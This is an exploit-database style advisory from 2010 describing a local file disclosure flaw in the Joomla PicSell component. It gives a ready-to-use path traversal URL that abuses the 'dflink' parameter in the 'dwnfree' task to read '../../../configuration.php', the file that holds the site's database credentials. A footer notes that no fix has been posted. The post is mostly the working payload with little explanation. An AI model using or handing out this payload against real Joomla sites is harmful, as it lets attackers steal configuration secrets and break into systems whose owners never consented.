Joomla PicSell Component (com_picsell) Local File Disclosure Vulnerability

2010-08-30 09:15:11

# Author: Craw
# Email: [email protected]
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications

=======================================================

[+] ExploiT :

http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]


[+] Example :

http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php


=======================================================
Greetz @ LUXEMBOURG
=======================================================

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.